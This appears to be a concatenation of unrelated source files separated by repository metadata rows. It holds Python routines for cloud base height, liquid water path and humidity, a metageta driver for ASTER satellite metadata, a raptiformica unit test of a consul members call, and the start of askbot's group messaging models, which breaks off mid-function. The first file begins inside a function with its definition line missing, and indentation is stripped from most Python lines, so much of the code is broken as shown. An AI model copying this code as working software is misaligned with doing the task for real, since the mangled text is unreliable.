	# Calculate cloud base height when liquid water potential temperature (theta [K]) and water
# vapor mixing ratio (rw [kg/kg]) are constants. Surface pressure p_surf is given in Pa.
# For more information, see "lifted condensation level" (LCL).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
#
# Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while RH<100 and z<10000:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud
if RH<100: return -999
#
# Return cloud base altitude
return z
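# Example (added sketch with illustrative values): cloud base altitude for a
# well-mixed boundary layer with p_surf=101780 Pa, theta=293 K and rw=8 g/kg
# zb = calc_cloud_base(101780., 293., 8.0e-3)
# print 'Cloud base altitude (m):', zb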
def calc_lwc_altitude(p_surf,theta,rw,zz):
# Calculate cloud water mixing ratio at a given altitude z (m) when liquid water potential
	# temperature (theta [K]) and water vapor mixing ratio (rw [kg/kg]) are constants.
# Surface pressure p_surf is given in Pa.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while z<zz:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<100: return 0.0
#
# b) Integrate up to given altitude
while z<zz:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
	# Return cloud water mixing ratio = total - vapor
return rw-q_sat
def solve_rw(p_surf,theta,lwc,zz):
# Solve total water mixing ratio (rw, kg/kg) from surface pressure (p_surf, Pa), liquid water potential
# temperature (theta, K) and liquid water mixing ratio (lwc) at altitude zz (m)
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
	# Minimum water vapor mixing ratio is at least lwc
q_min=lwc
#
# Maximum water vapor mixing ratio is unlimited, but should be smaller
	# than that of a cloud whose base is at the surface
t_surf=theta*(p_surf/p00)**rcp
q_max=calc_sat_mixr(p_surf,t_surf)
#
k=0
while k<100:
q_new=(q_min+q_max)/2
lwc_calc=calc_lwc_altitude(p_surf,theta,q_new,zz)
#
if abs(lwc-lwc_calc)<1e-7:
break
elif lwc<lwc_calc:
q_max=q_new
else:
q_min=q_new
k+=1
# Failed
	if k==100: return -999
#
return q_new
def calc_lwp(p_surf,theta,pblh,rt):
# Calculate liquid water path (kg/m^2) when boundary layer liquid water potential temperature (theta [K]) and total
# water mixing ratio (rt [kg/kg]) are constants from surface (p_surf, Pa) up to boundary layer top (pblh, Pa or km).
# In addition to the liquid water path, function returns cloud base and top heights (m) and the maximum (or cloud top)
# liquid water mixing ratio (kg/kg).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# It is assumed that a pblh value smaller than 10 is in kilometers and a value larger than that is Pa
if pblh<10.0:
z_top=pblh*1000. # from km to m (above surface)
p_top=0.
else:
z_top=10e3
p_top=p_surf-pblh # Pa (above surface)
#
# Outputs
lwp=0. # Liquid water path (g/m^2)
zb=-999. # Cloud base height (m)
zc=-999. # Cloud top height (m)
clw_max=0. # Maximum cloud liquid water
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while press>p_top and z<=z_top:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rt,tavg,press)
if RH>100:
zb=z
break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rt)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<=100: return lwp,zb,zc,clw_max
zb=z
#
# b) Integrate up to the given altitude
while press>p_top and z<=z_top:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
#q_sat=calc_sat_mixr(press,tavg)
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
		# Cloud water mixing ratio = total - vapor
rc=max(0.,rt-q_sat)
# LWP integral
lwp+=rc*dz*press/(R*tavg*xsi)
#
# Cloud top height
zc=z
clw_max=rc
#
# Return LWP (kg/m^2) and boundary layer height (m)
return lwp,zb,zc,clw_max
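# Example (added sketch with illustrative values): adiabatic LWP for a boundary
# layer with p_surf=101780 Pa, theta=293 K, depth 200 hPa and rt=7.2 g/kg
# lwp, zb, zc, clw_max = calc_lwp(101780., 293., 20000., 7.2e-3)
# print lwp*1e3, zb, zc # LWP (g/m^2), cloud base and cloud top heights (m)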
def solve_rw_lwp(p_surf,theta,lwp,pblh,debug=False):
# Solve boundary layer total water mixing ratio (kg/kg) from liquid water potential temperature (theta [K]),
# liquid water path (lwp, kg/m^2) and boundary layer height (pblh, Pa or km) for an adiabatic cloud.
# For example, solve_rw_lwp(101780.,293.,100e-3,20000.) would return 0.00723684088331 [kg/kg].
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
	# LWP tolerance: 0.1 %, but at least 0.1e-3 kg/m^2 and at most 1e-3 kg/m^2
tol=min(max(0.001*lwp,0.1e-3),1e-3)
#
# Surface temperature (dry, i.e. no fog)
t_surf=theta*(p_surf/p00)**rcp
#
# The highest LWP when RH=100% at the surface (no fog)
rw_max= calc_sat_mixr(p_surf,t_surf)
lwp_max,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_max)
# No fog cases
if lwp_max<lwp:
if debug: print ('Too high LWP (%5.1f g/m2), the maximum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_max*1e3,theta,pblh/100.)
return -999.
#
# The lowest LWP when RH=0% at the surface
rw_min=0.
lwp_min,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_min)
if lwp_min>lwp:
		if debug: print ('Too low LWP (%5.1f g/m2), the minimum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)')%(lwp*1e3, lwp_min*1e3,theta,pblh/100.)
return -999.
#
k=0
while k<100:
rw_new=(rw_min+rw_max)*0.5
lwp_new,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_new)
#
if abs(lwp-lwp_new)<tol or abs(rw_max-rw_min)<0.001e-3:
return rw_new
elif lwp<lwp_new:
rw_max=rw_new
else:
rw_min=rw_new
k+=1
#
# Failed
if debug: print ('Iteration failed: current LWP=%5.1f, target LWP=%5.1f')%(lwp_new*1e3,lwp*1e3)
return -999.
def solve_q_inv_RH(press,tpot,q,max_RH):
# Function for adjusting total water mixing ratio so that the calculated RH will be no more
# than the given RH limit. This function can be used to increase humidity inversion so that RH
# above cloud is less than 100%. For this purpose the typical inputs are:
# press [Pa] = p_surf - pblh
# tpot [K] = tpot_pbl + tpot_inv
# q [kg/kg] = q_pbl - q_inv
# RH [%] = 98.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
p00=1.0e+05
#
# Temperature (K)
temp=tpot*(press/p00)**rcp
#
# RH (%)
rh=calc_rh(q,temp,press)
#
# All done if RH is not exceeding the RH limit
if rh<=max_RH: return q, rh, rh
#
# Solve q so that RH=max_RH
q_min=0.
q_max=q
k=0
while k<200:
q_new=0.5*(q_min+q_max)
rh_new=calc_rh(q_new,temp,press)
#
if abs(rh_new-max_RH)<0.001:
return q_new, rh_new, rh
elif rh_new>max_RH:
q_max=q_new
else:
q_min=q_new
k+=1
#
# Failed
print 'Failed to solve water vapor mixing ratio from given RH!'
return -999.,-999., rh
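# Example (added sketch following the "typical inputs" listed above; values are
# illustrative): limit the relative humidity just above the boundary layer top
# q_new, rh_new, rh_orig = solve_q_inv_RH(101780.-20000., 293.+5., 8.0e-3-2.0e-3, 98.)
# q_new is the (possibly reduced) mixing ratio, rh_new and rh_orig the adjusted
# and original relative humidities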
#
#
#
# ================ Helper functions ================
#
def ls_fit(xx,yy):
# Simple linear least squares fit: y=a+b*x
import numpy
#
# Ignore NaN's
x=[]; y=[]
i=0
for val in xx:
if not (numpy.isnan(xx[i]) or numpy.isnan(yy[i])):
x.append(xx[i])
y.append(yy[i])
i+=1
#
if len(x)<=1:
# Scalar
a=0.0; a_std=0.0
b=1.0; b_std=0.0
else:
# Matrix H
H = numpy.matrix( numpy.vstack([numpy.ones(len(x)),x]).T )
# LS solution
th=numpy.linalg.inv( H.T*H ) * H.T *numpy.matrix(y).T
# Outputs
a=numpy.asscalar(th[0])
b=numpy.asscalar(th[1])
# Parameter uncertainty
if len(x)>2:
# Variance
sv2=((numpy.matrix(y).T-H*th).T * (numpy.matrix(y).T-H*th) )/(len(x)-2)
std=numpy.sqrt( numpy.asscalar(sv2) * numpy.diagonal( numpy.linalg.inv( H.T*H ) ) )
# Outputs
a_std=numpy.asscalar(std[0])
b_std=numpy.asscalar(std[1])
else:
a_std=0.0
b_std=0.0
#
return a,b,a_std,b_std,
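# Example (added sketch): a perfect line y=1+2*x should return a=1 and b=2 with
# zero standard deviations
# a,b,a_std,b_std = ls_fit([0.,1.,2.,3.],[1.,3.,5.,7.])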
def average_scaled(x,y):
# Calculate average of x/y so that points where y=0 are ignored
import numpy
sx=0.
sx2=0.
n=0
i=0
for yy in y:
if yy>0.:
sx+=x[i]/yy
sx2+=(x[i]/yy)**2
n+=1
i+=1
#
if n==0:
return -999., -999.
elif n==1:
return sx, -999.
else:
return sx/n, numpy.sqrt( sx2/n - (sx/n)**2 )
#
# Functions from the LES model
#
def calc_psat_w(T):
# Function calculates the saturation vapor pressure (Pa) of liquid water as a function of temperature (K)
#
# thrm.f90: real function rslf(p,t)
c0=0.6105851e+03
c1=0.4440316e+02
c2=0.1430341e+01
c3=0.2641412e-01
c4=0.2995057e-03
c5=0.2031998e-05
c6=0.6936113e-08
c7=0.2564861e-11
c8=-.3704404e-13
#
x=max(-80.,T-273.16)
return c0+x*(c1+x*(c2+x*(c3+x*(c4+x*(c5+x*(c6+x*(c7+x*c8)))))))
def calc_sat_mixr(p,T):
# Function calculates saturation mixing ratio for water (kg/kg)
#
# thrm.f90: real function rslf(p,t)
#
	# r=m_w/m_air
# R/Rm=287.04/461.5=.622
#
esl=calc_psat_w(T)
return .622*esl/(p-esl)
def calc_rh(rw,T,press):
# Calculate RH (%) from water vapor mixing ratio rw (r=m_w/m_air [kg/kg]), temperature (K) and pressure (Pa)
#
	# r=m_w/m_air=pw/Rm/(pair/R)=pw/(p-pw)*R/Rm => pw=p*r/(R/Rm+r)
#
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # Specific gas constant for water
ep=R/Rm
#
psat=calc_psat_w(T)
return press*rw/(ep+rw)/psat*100
# When ep>>rw => RH=press*rw/(ep*psat)*100
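# Example (added sketch with approximate values): at T=293.15 K calc_psat_w(T)
# is about 2.3e3 Pa, calc_sat_mixr(101325.,293.15) is roughly 1.5e-2 kg/kg, and
# calc_rh(8.0e-3,293.15,101325.) gives a relative humidity of roughly 55 %.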
# ================================ | gpl-3.0 | -796,236,915,224,271,000 | 29.041192 | 152 | 0.632624 | false | 2.454842 | false | false | false |
ssutee/metageta | metageta/formats/aster.py | 2 | 11439 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Metadata driver for ASTER imagery
B{Format specifications}:
- U{http:#www.gdal.org/frmt_hdf4.html}
- U{http://asterweb.jpl.nasa.gov/documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf}
- U{http://asterweb.jpl.nasa.gov/content/03_data/04_Documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf} (inc description of GCTP projection parameters)
- U{http://lpdaac.usgs.gov/aster/ASTER_GeoRef_FINAL.pdf}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/users_guide/index.html}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/pdf/ASTER_Ref_V1.pdf}
'''
format_regex=[r'ast_l1[ab].*\.hdf$',r'pg-PR1[AB]0000-\d{10}_\d{3}_\d{3}$'] #HDF inc. ASTER
'''Regular expression list of file formats'''
#import base dataset module
import __dataset__
# import other modules (use "_" prefix to import privately)
import sys, os, re, glob, time, math, string
from metageta import utilities, geometry, spatialreferences
try:
from osgeo import gdal
from osgeo import gdalconst
from osgeo import osr
from osgeo import ogr
except ImportError:
import gdal
import gdalconst
import osr
import ogr
gdal.AllRegister()
class Dataset(__dataset__.Dataset): #Subclass of base Dataset class
def __init__(self,f=None):
if not f:f=self.fileinfo['filepath']
if f[:4]=='/vsi':raise NotImplementedError
self.filelist=glob.glob(os.path.splitext(f)[0]+'.*')
self._gdaldataset = geometry.OpenDataset(f)
self._hdf_md=self._gdaldataset.GetMetadata()
if not self._hdf_md.get('INSTRUMENTSHORTNAME')=='ASTER':
raise NotImplementedError #This error gets ignored in __init__.Open()
def __getmetadata__(self,f=None):
'''Read Metadata for ASTER HDF images as GDAL doesn't.'''
if not f:f=self.fileinfo['filepath']
hdf_sd=self._gdaldataset.GetSubDatasets()
hdf_sd= [sd for sd,sz in hdf_sd if 'ImageData' in sd]
hdf_md=self._hdf_md
#sd,sz = hdf_sd[0]
sd = hdf_sd[0]
sd=geometry.OpenDataset(sd)
nbands=len(hdf_sd)
ncols=[]
nrows=[]
nbits=[]
bands=[]
datatypes=[]
cellxy=[]
for i in range(0,len(hdf_md['PROCESSEDBANDS']), 2):
band=hdf_md['PROCESSEDBANDS'][i:i+2]
if i/2+1 <= 4:
bands.append('VNIR'+band)
cellxy.append('15')
elif i/2+1 <= 10:
bands.append('SWIR'+band)
cellxy.append('30')
else:
bands.append('TIR'+band)
cellxy.append('90')
if band.isdigit():band=str(int(band)) #Get rid of leading zero
cols,rows,bytes=map(int,hdf_md['IMAGEDATAINFORMATION%s' % band].split(','))
if bytes==1:datatypes.append('Byte')
elif bytes==2:datatypes.append('UInt16')
ncols.append(str(cols))
nrows.append(str(rows))
nbits.append(str(bytes*8))
ncols=','.join(ncols)
nrows=','.join(nrows)
nbits=','.join(nbits)
bands=','.join(bands)
datatypes=','.join(datatypes)
cellxy=','.join(cellxy)
uly,ulx=[float(xy) for xy in hdf_md['UPPERLEFT'].split(',')]
ury,urx=[float(xy) for xy in hdf_md['UPPERRIGHT'].split(',')]
lry,lrx=[float(xy) for xy in hdf_md['LOWERRIGHT'].split(',')]
lly,llx=[float(xy) for xy in hdf_md['LOWERLEFT'].split(',')]
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
#SRS reported by GDAL is slightly dodgy, GDA94 is not recognised and doesn't set the North/South properly
#Get it anyway so we can work out if it's GDA94 based on the spheroid
srs=sd.GetGCPProjection()
src_srs=osr.SpatialReference(srs)
tgt_srs=osr.SpatialReference()
geogcs=osr.SpatialReference()
if src_srs.GetAttrValue('SPHEROID') == 'GRS 1980':geogcs.ImportFromEPSG(4283) #Assume 'GDA94'
else:geogcs.ImportFromEPSG(4326) #Assume 'WGS84'
tgt_srs.CopyGeogCSFrom(geogcs)
if hdf_md['PROCESSINGLEVELID'].upper()=='1A':
units='deg'
else:
#projparams=map(float, hdf_md['PROJECTIONPARAMETERS1'].split(','))
if hdf_md['MPMETHOD1'] == 'UTM':#Universal Transverse Mercator
if uly < 0:bNorth=False #GDAL doesn't set the North/South properly
else:bNorth=True
nZone = int(hdf_md['UTMZONECODE1'])
tgt_srs.SetUTM(nZone,bNorth)
units='m'
#Other projections not (yet?) implemented...
#elif hdf_md['MPMETHOD1'] == 'PS':#Polar Stereographic
# #dfCenterLon = ? GTCP projection params don't list cenlon/lat for PS
# dfCenterLat = ?
# dfScale = ?
# tgt_srs.SetPS(dfCenterLat,dfCenterLon,dfScale,0.0,0.0)
#elif hdf_md['MPMETHOD1'] == 'LAMCC':#Lambert Conformal Conic
# dfCenterLon = ?
# dfCenterLat = ?
# dfStdP1 = ?
# dfStdP2 = ?
# tgt_srs.SetLCC(dfStdP1,dfStdP2,dfCenterLat,dfCenterLon,0,0)
#elif hdf_md['MPMETHOD1'] == 'SOM':#Space Oblique Mercator
# dfCenterLon = ?
# dfCenterLat = ?
# srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
#elif hdf_md['MPMETHOD1'] == 'EQRECT':#Equi-Rectangular
# dfCenterLon = ?
# dfCenterLat = ?
# tgt_srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
else: #Assume Geog
units='deg'
srs=tgt_srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['satellite']='Terra'
self.metadata['sensor']='ASTER'
self.metadata['filetype'] = self._gdaldataset.GetDriver().ShortName+'/'+self._gdaldataset.GetDriver().LongName + ' (ASTER)'
self.metadata['sceneid'] = hdf_md['ASTERSCENEID']
self.metadata['level'] = hdf_md['PROCESSINGLEVELID']
if '-' in hdf_md['CALENDARDATE']:imgdate = hdf_md['CALENDARDATE']
else:imgdate = time.strftime(utilities.dateformat,time.strptime(hdf_md['CALENDARDATE'],'%Y%m%d')) #ISO 8601
imgtime = hdf_md.get('TIMEOFDAY')
if imgtime:self.metadata['imgdate'] = time.strftime(utilities.datetimeformat,time.strptime(imgdate+imgtime[0:6],'%Y-%m-%d%H%M%S')) #ISO 8601
else:self.metadata['imgdate'] = imgdate
#self.metadata['imgdate'] = hdf_md['CALENDARDATE']
self.metadata['cloudcover'] = float(hdf_md['SCENECLOUDCOVERAGE'])
if hdf_md['FLYINGDIRECTION']=='DE':self.metadata['orbit'] = 'Descending'
else:self.metadata['orbit'] = 'Ascending'
self.metadata['rotation']=float(hdf_md.get('MAPORIENTATIONANGLE',hdf_md.get('SCENEORIENTATIONANGLE')))
if abs(self.metadata['rotation']) < 1.0: self.metadata['orientation']='Map oriented'
else: self.metadata['orientation']='Path oriented'
self.metadata['sunazimuth'],self.metadata['sunelevation']=map(float,hdf_md['SOLARDIRECTION'].split(','))
self.metadata['viewangle'] = float(hdf_md['POINTINGANGLE'])
self.metadata['cols'] = ncols
self.metadata['rows'] = nrows
self.metadata['nbands'] = nbands
self.metadata['datatype'] = datatypes
self.metadata['nbits'] = nbits
self.metadata['nodata']=','.join(['0' for i in range(0,nbands)])
self.metadata['bands'] = bands
self.metadata['resampling'] = hdf_md.get('RESMETHOD1') #Assume same for all...
self.metadata['srs']= srs
self.metadata['epsg']= spatialreferences.IdentifyAusEPSG(srs)
self.metadata['units']= units
self.metadata['cellx'],self.metadata['celly']=cellxy,cellxy
#Geotransform
ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
ncols=map(int, str(ncols).split(','))
nrows=map(int, str(nrows).split(','))
cellx,celly=[],[]
j=0
while j < len(ncols):
gcps=[];i=0
lr=[[0,0],[ncols[j],0],[ncols[j],nrows[j]],[0,nrows[j]]]
while i < len(ext)-1: #don't need the last xy pair
gcp=gdal.GCP()
gcp.GCPPixel,gcp.GCPLine=lr[i]
gcp.GCPX,gcp.GCPY=ext[i]
gcp.Id=str(i)
gcps.append(gcp)
i+=1
j+=1
geotransform = gdal.GCPsToGeoTransform(gcps)
x,y=geometry.CellSize(geotransform)
cellx.append(str(x))
celly.append(str(abs(y)))
self.metadata['cellx']=','.join(cellx)
self.metadata['celly']=','.join(celly)
srs=osr.SpatialReference()
srs.ImportFromEPSG(4326)
self.metadata['srs']= srs.ExportToWkt()
self.metadata['UL']='%s,%s' % tuple(ext[0])
self.metadata['UR']='%s,%s' % tuple(ext[1])
self.metadata['LR']='%s,%s' % tuple(ext[2])
self.metadata['LL']='%s,%s' % tuple(ext[3])
self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
self.metadata['filesize']=sum([os.path.getsize(file) for file in self.filelist])
self.metadata['compressionratio']=0
self.metadata['compressiontype']='None'
self.extent=ext
#Build gdaldataset object for overviews
vrtcols=ncols[0]
vrtrows=nrows[0]
#vrtbands=[sd for sd,sn in hdf_sd[0:4]]#The 4 VNIR bands
vrtbands=hdf_sd[0:4]#The 4 VNIR bands
vrt=geometry.CreateSimpleVRT(vrtbands,vrtcols,vrtrows,datatypes.split(',')[0])
self._gdaldataset=geometry.OpenDataset(vrt)
for i in range(1,5):
self._gdaldataset.GetRasterBand(i).SetNoDataValue(0)
| mit | -5,271,356,719,638,829,000 | 43.756 | 155 | 0.587551 | false | 3.344737 | false | false | false |
vdloo/raptiformica | tests/unit/raptiformica/distributed/members/test_try_get_members_list.py | 1 | 1267 | from raptiformica.distributed.members import try_get_members_list
from tests.testcase import TestCase
class TestTryGetMembersList(TestCase):
def setUp(self):
self.try_machine_command = self.set_up_patch('raptiformica.distributed.members.try_machine_command')
self.try_machine_command.return_value = ('output', '5.6.7.8', '22')
self.host_and_port_pairs = [
('1.2.3.4', '2222'),
('5.6.7.8', '22')
]
def test_try_get_members_list_tries_machine_command(self):
try_get_members_list(self.host_and_port_pairs)
expected_command = ['consul', 'members']
self.try_machine_command.assert_called_once_with(
self.host_and_port_pairs,
expected_command,
attempt_message="Trying to get members list from {}:{}",
all_failed_message="Could not list members in the distributed network. "
"Maybe no meshnet has been established yet. "
"Do you have at least three machines running?"
)
def test_try_get_members_list_returns_output_from_first_successful_members_list(self):
ret = try_get_members_list(self.host_and_port_pairs)
self.assertEqual(ret, 'output')
| mit | 7,409,344,987,150,709,000 | 41.233333 | 108 | 0.620363 | false | 3.693878 | true | false | false |
PearsonIOKI/compose-forum | askbot/deps/group_messaging/models.py | 8 | 15440 | """models for the ``group_messaging`` app
"""
import copy
import datetime
import urllib
from askbot.mail import send_mail #todo: remove dependency?
from django.template.loader import get_template
from django.db import models
from django.db.models import signals
from django.conf import settings as django_settings
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
MAX_HEADLINE_LENGTH = 80
MAX_SENDERS_INFO_LENGTH = 64
MAX_SUBJECT_LINE_LENGTH = 30
#dummy parse message function
parse_message = lambda v: v
GROUP_NAME_TPL = '_personal_%s'
def get_recipient_names(recipient_groups):
"""returns list of user names if groups are private,
or group names, otherwise"""
names = set()
for group in recipient_groups:
if group.name.startswith('_personal_'):
names.add(group.user_set.all()[0].username)
else:
names.add(group.name)
return names
def get_personal_group_by_user_id(user_id):
return Group.objects.get(name=GROUP_NAME_TPL % user_id)
def get_personal_groups_for_users(users):
"""for a given list of users return their personal groups"""
group_names = [(GROUP_NAME_TPL % user.id) for user in users]
return Group.objects.filter(name__in=group_names)
def get_personal_group(user):
"""returns personal group for the user"""
return get_personal_group_by_user_id(user.id)
def create_personal_group(user):
"""creates a personal group for the user"""
group = Group(name=GROUP_NAME_TPL % user.id)
group.save()
return group
class LastVisitTime(models.Model):
"""just remembers when a user has
last visited a given thread
"""
user = models.ForeignKey(User)
message = models.ForeignKey('Message')
at = models.DateTimeField(auto_now_add=True)
class Meta:
unique_together = ('user', 'message')
class SenderListManager(models.Manager):
"""model manager for the :class:`SenderList`"""
def get_senders_for_user(self, user=None):
"""returns query set of :class:`User`"""
user_groups = user.groups.all()
lists = self.filter(recipient__in=user_groups)
user_ids = lists.values_list(
'senders__id', flat=True
).distinct()
return User.objects.filter(id__in=user_ids)
class SenderList(models.Model):
"""a model to store denormalized data
about who sends messages to any given person
sender list is populated automatically
as new messages are created
"""
recipient = models.ForeignKey(Group, unique=True)
senders = models.ManyToManyField(User)
objects = SenderListManager()
class MessageMemo(models.Model):
"""A bridge between message recipients and messages
these records are only created when user sees a message.
The idea is that using groups as recipients, we can send
messages to massive numbers of users, without cluttering
the database.
Instead we'll be creating a "seen" message after user
reads the message.
"""
SEEN = 0
ARCHIVED = 1
STATUS_CHOICES = (
(SEEN, 'seen'),
(ARCHIVED, 'archived')
)
user = models.ForeignKey(User)
message = models.ForeignKey('Message', related_name='memos')
status = models.SmallIntegerField(
choices=STATUS_CHOICES, default=SEEN
)
class Meta:
unique_together = ('user', 'message')
class MessageManager(models.Manager):
"""model manager for the :class:`Message`"""
def get_sent_threads(self, sender=None):
"""returns list of threads for the "sent" mailbox
this function does not deal with deleted=True
"""
responses = self.filter(sender=sender)
responded_to = models.Q(descendants__in=responses, root=None)
seen_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=sender
)
seen_responses = self.filter(responded_to & seen_filter)
unseen_responses = self.filter(responded_to & ~models.Q(memos__user=sender))
return (
self.get_threads(sender=sender) \
| seen_responses.distinct() \
| unseen_responses.distinct()
).distinct()
def get_threads(self, recipient=None, sender=None, deleted=False):
"""returns query set of first messages in conversations,
based on recipient, sender and whether to
load deleted messages or not"""
if sender and sender == recipient:
raise ValueError('sender cannot be the same as recipient')
filter_kwargs = {
'root': None,
'message_type': Message.STORED
}
if recipient:
filter_kwargs['recipients__in'] = recipient.groups.all()
else:
#todo: possibly a confusing hack - for this branch -
#sender but no recipient in the args - we need "sent" origin threads
recipient = sender
user_thread_filter = models.Q(**filter_kwargs)
filter = user_thread_filter
if sender:
filter = filter & models.Q(sender=sender)
if deleted:
deleted_filter = models.Q(
memos__status=MessageMemo.ARCHIVED,
memos__user=recipient
)
return self.filter(filter & deleted_filter)
else:
#rather a tricky query (may need to change the idea to get rid of this)
#select threads that have a memo for the user, but the memo is not ARCHIVED
#in addition, select threads that have zero memos for the user
marked_as_non_deleted_filter = models.Q(
memos__status=MessageMemo.SEEN,
memos__user=recipient
)
#part1 - marked as non-archived
part1 = self.filter(filter & marked_as_non_deleted_filter)
#part2 - messages for the user without an attached memo
part2 = self.filter(filter & ~models.Q(memos__user=recipient))
return (part1 | part2).distinct()
def create(self, **kwargs):
"""creates a message"""
root = kwargs.get('root', None)
if root is None:
parent = kwargs.get('parent', None)
if parent:
if parent.root:
root = parent.root
else:
root = parent
kwargs['root'] = root
headline = kwargs.get('headline', kwargs['text'])
kwargs['headline'] = headline[:MAX_HEADLINE_LENGTH]
kwargs['html'] = parse_message(kwargs['text'])
message = super(MessageManager, self).create(**kwargs)
#creator of message saw it by definition
        #create a "seen" memo for the sender, because we
#don't want to inform the user about his/her own post
sender = kwargs['sender']
MessageMemo.objects.create(
message=message, user=sender, status=MessageMemo.SEEN
)
return message
def create_thread(self, sender=None, recipients=None, text=None):
"""creates a stored message and adds recipients"""
message = self.create(
message_type=Message.STORED,
sender=sender,
senders_info=sender.username,
text=text,
)
now = datetime.datetime.now()
LastVisitTime.objects.create(message=message, user=sender, at=now)
names = get_recipient_names(recipients)
message.add_recipient_names_to_senders_info(recipients)
message.save()
message.add_recipients(recipients)
message.send_email_alert()
return message
def create_response(self, sender=None, text=None, parent=None):
message = self.create(
parent=parent,
